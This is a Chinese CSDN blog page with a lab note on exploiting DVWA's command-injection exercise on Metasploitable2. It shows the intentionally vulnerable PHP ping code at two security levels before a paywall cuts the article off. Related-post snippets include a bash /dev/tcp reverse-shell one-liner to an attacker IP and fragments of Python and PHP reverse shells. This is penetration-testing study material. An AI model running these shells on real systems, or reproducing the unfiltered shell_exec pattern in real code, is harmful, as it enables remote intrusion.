手工挖洞学习笔记:dvwa命令执行漏洞/载入php反弹shell

最新推荐文章于 2024-04-21 12:44:28 发布
最新推荐文章于 2024-04-21 12:44:28 发布
阅读量1.3k 收藏 3
点赞数 5
分类专栏: 渗透 小白自学 文章标签: linux shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AI_Jardon/article/details/107985442
版权

命令执行漏洞

工具:

(1)靶机:Metasploitable2
(2)nc
(3)kali
在这里插入图片描述

dvwa

代码审计:安全级别为low
<?php 
if( isset( $_POST[ 'Submit' ]  ) ) {
    
    // Get input 
    $target = $_REQUEST[ 'ip' ]; 
    // Determine OS and execute the ping command. 
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
    
        // Windows 
        $cmd = shell_exec( 'ping  ' . $target ); 
    } 
    else {
    
        // *nix 
        $cmd = shell_exec( 'ping  -c 4 ' . $target ); 
    } 
    // Feedback for the end user 
    echo "<pre>{
     $cmd}</pre>"; 
} 
 
?>

可以看出没有任何过滤

代码审计:安全级别:medium
<?php
 
if( isset( $_POST[ 'Submit' ]  ) ) {
   
    // Get input
    $target = $_REQUEST[ 'ip' ];
    // Set blacklist
    $substitutions = array(
        '&&' => '', //增加了&&过滤
        ';'  => '',
最低0.47元/天 解锁文章
孤独的平身
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1152
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
053 OS命令注入与DVWA靶场搭建及命令注入
鸡蛋炒鸡蛋
03-11 2824
文章目录
获取完美shell
em.....
06-01 677
微信公众号:小惜渗透,欢迎大佬一起交流进步 下面我将边演示边来介绍几种提升shell的方法,我这里面用的Linux虚拟机搭的DVWA靶场上传文件(吐槽一下,在windows上用小皮面板搭建一点问题没有,在Linux上可能因为权限的问题,文件上传那块正常的图片就死活传不上去,后来自己一顿调,本来都想放弃了,结果瞎调调好了)首先我这里用哥斯拉打开命令界面这时候可以通过方向上键回历史记录,但是一些需要交互的命令,如su或者vim都会执行失败,那么我们首先想到的肯定是反弹shell反弹shell命令大全,我公众
反弹shell 看这一篇就够了
最新发布
m0_69043895的博客
04-21 1515
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
PHP反弹shell
痴人说梦梦中人
09-26 7384
步骤详解: 前提: ①、PHPStudy开启相关服务。 ②、假设木马已上传至服务器且可以访问(即执行代码才能反弹shell)。 ③、攻击机器和受害服务器要处于同一网段。 1、划线为攻击机的IP+端口。 2、攻击机监听自身端口4444,即可获取执行shell。 <?php set_time_limit(0); $ip=$_POST['ip']; $port=$_POST['port'];...
php反弹shell脚本
a1_pha的博客
01-24 749
用msfvenom也可以生成反弹shell脚本,但有时候用不了。
【安全知识】——LInux的shell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6045
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
网络安全原理与应用:windows命令执行漏洞演示.pptx
05-16
【网络安全原理与应用:Windows命令执行漏洞演示】 在网络安全领域,Web应用安全是至关重要的一环,而Windows命令执行漏洞则是其中常见的威胁之一。本演示主要针对Windows系统中的命令执行漏洞,通过DVWA(Damn ...
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
DVWA-master.zip_DVWA_php_漏洞_靶场
09-24
php攻防练习靶场,多种漏洞组合,练习代码审计,避免开发出现漏洞
dvwa:dvwa教学版
03-07
DVWA的目的是通过简单易用的界面来实践一些最常见的Web漏洞,这些漏洞具有不同的难度。 请注意,此软件同时存在已记录和未记录的漏洞。 这是故意的。 鼓励您尝试发现尽可能多的问题。警告! 该死的漏洞Web应用程序...
DVWA学习笔记全等级
06-08
DVWA学习笔记全等级
DVWA反弹shell实验
命运的旋律的博客
12-13 1299
反弹shell实验 实验环境:metasploitable2;dvwa-linux版 ##操作过程 进入kali的web服务根目录/var/www/html,写入getshell.py的python程序 #leafpad getshell.py import socket,subprocess,os s=socket. socket( socket.AF_INET , socket. SOC...
DVWA靶场之命令执行(Command injection)通关详解
weixin_56464045的博客
12-17 901
DVWA靶场 命令执行 Command injection 详解
PHP代码实现反弹shell
E1even的博客
08-28 3724
打靶机的时候遇到了,有时候反弹效果失败,下面这个PHP代码基本可以通杀 转载至链接:https://www.cnblogs.com/alex-13/p/3667790.html <?php function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); } function execute($cfe) { $res = ''; if ($cfe) { if(function_exists(
各种shell反弹方法
weixin_46626737的博客
05-16 2576
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
然后点击create reset database时提示Fatal error: Uncaught mysqli_sql_exception: Connection refused in /var/www/html/DVWA/dvwa/includes/DBMS/MySQL.php:13 Stack trace: #0 /var/www/html/DVWA/dvwa/includes/DBMS/MySQL.php(13): mysqli_connect() #1 /var/www/html/DVWA/setup.php(23): include_once('...') #2 {main} thrown in /var/www/html/DVWA/dvwa/includes/DBMS/MySQL.php on line 13怎么办
07-25
这个错误提示表明 DVWA 在连接 MySQL 数据库时遇到了问题。可能的原因是数据库连接配置不正确或数据库服务器无法访问。您可以尝试以下步骤来解决这个问题: 1. 确保您的 MySQL 服务器正在运行,并且具有与 DVWA 使用的数据库相对应的数据库。 2. 检查 DVWA 的配置文件,确保数据库连接配置正确。打开 `/var/www/html/DVWA/config/config.inc.php` 文件,并确认以下配置项正确设置: ```php $_DVWA['db_server'] = 'localhost'; // 数据库服务器的主机名或 IP 地址 $_DVWA['db_database'] = 'dvwa'; // 数据库名称 $_DVWA['db_user'] = 'root'; // 数据库用户名 $_DVWA['db_password'] = ''; // 数据库密码 ``` 3. 确保 MySQL 扩展库已正确安装和启用。您可以运行 `php -m | grep mysqli` 命令来检查是否存在 mysqli 扩展。 4. 确保您的数据库服务器允许来自 DVWA 所在服务器的连接。检查是否存在任何防火墙规则或其他网络设置,阻止了从 DVWA 服务器到 MySQL 服务器的连接。 5. 如果您使用的是非默认端口的 MySQL 服务器,请确保在 `$_DVWA['db_server']` 中指定了正确的端口号。 6. 如果您修改了配置文件,请保存并关闭文件。 7. 尝试重新运行 DVWA 的 `setup.php` 文件,确保您的数据库连接配置和服务器可访问性都是正确的。 如果问题仍然存在或有其他疑问,请随时向我提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值